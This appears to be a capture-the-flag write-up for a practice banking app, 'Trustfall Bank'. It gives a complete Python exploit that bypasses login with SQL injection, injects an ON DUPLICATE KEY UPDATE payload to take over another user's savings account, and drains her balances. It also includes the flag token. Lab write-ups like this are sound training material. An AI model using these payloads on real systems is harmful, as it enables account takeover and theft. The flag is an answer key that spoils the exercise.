master
Raw Download raw file

Trustfall Bank – TOKEN4

Token: PCCC{Alice_is_broke_Cs_4569}

Background

Account creation is SQL-injectable. As Carol, inject Alice’s savings account (5DA0D3F1) into Carol’s account list, then transfer both of Alice’s balances to Carol’s investment (B93B14BD). Grading at /grade/account-drain returns the token.

From Nothing to Working

  1. Login as Carol via SQLi (carol'-- -) to get a session.
  2. Abuse /accounts/new SQLi to add Alice’s savings account number into Carol’s list.
  3. Perform two transfers: Alice Checking → Carol Investment ($7336.74) and Alice Savings → Carol Investment ($6820.37).
  4. Hit /grade/account-drain; success response includes the token.

Command

python3 token4_drain.py

#!/usr/bin/env python3
# token4_drain.py
import requests, re

TARGET = "http://trustfallbank.us"
ALICE_CHECKING = "85A83FED"
ALICE_SAVINGS = "5DA0D3F1"
CAROL_INV = "B93B14BD"

def login_user(session, username):
    return session.post(f"{TARGET}/login", data={"username": f"{username}'-- -", "password": "x"}, allow_redirects=True)

def add_account(sess, name_payload, acc_type):
    return sess.post(f"{TARGET}/accounts/new", data={"name": name_payload, "type": acc_type}, allow_redirects=True)

def list_accounts(sess):
    r = sess.get(f"{TARGET}/accounts")
    return re.findall(r"[A-F0-9]{8}", r.text), r.text

def main():
    s = requests.Session()
    login_user(s, "carol")

    # Inject Alice savings into Carol accounts via ON DUPLICATE KEY UPDATE trick
    payload = f"x', 'savings', '{ALICE_SAVINGS}', 0.00) ON DUPLICATE KEY UPDATE user_id=(SELECT id FROM users WHERE username='carol') -- "
    add_account(s, payload, "savings")

    accounts, page = list_accounts(s)
    print(f"[*] Carol accounts: {accounts}")
    if ALICE_SAVINGS not in accounts:
        print("[-] Savings not visible; retry with different payload.")
        return

    # Transfers
    for src, amt in [(ALICE_CHECKING, "7336.74"), (ALICE_SAVINGS, "6820.37")]:
        r = s.post(f"{TARGET}/transfers/new", data={
            "from_account": src,
            "to_account": CAROL_INV,
            "amount": amt
        }, allow_redirects=True)
        print(f"[*] Transfer {src}->{CAROL_INV} ({amt}): {r.status_code}")

    grade = requests.get(f"{TARGET}/grade/account-drain")
    print(f"[*] Grade: {grade.text}")
    m = re.search(r"PCCC\{[^}]+\}", grade.text)
    if m:
        print(f"[+] TOKEN 4: {m.group()}")

if __name__ == "__main__":
    main()

Expected Output

[*] Carol accounts: ['85A83FED', 'E5215CD8', '5DA0D3F1', '18CD34BD', 'B93B14BD']
[*] Transfer 85A83FED->B93B14BD (7336.74): 200
[*] Transfer 5DA0D3F1->B93B14BD (6820.37): 200
[*] Grade: {"message":"tokenAccountDrain: Success -- PCCC{Alice_is_broke_Cs_4569}","success":true}
[+] TOKEN 4: PCCC{Alice_is_broke_Cs_4569}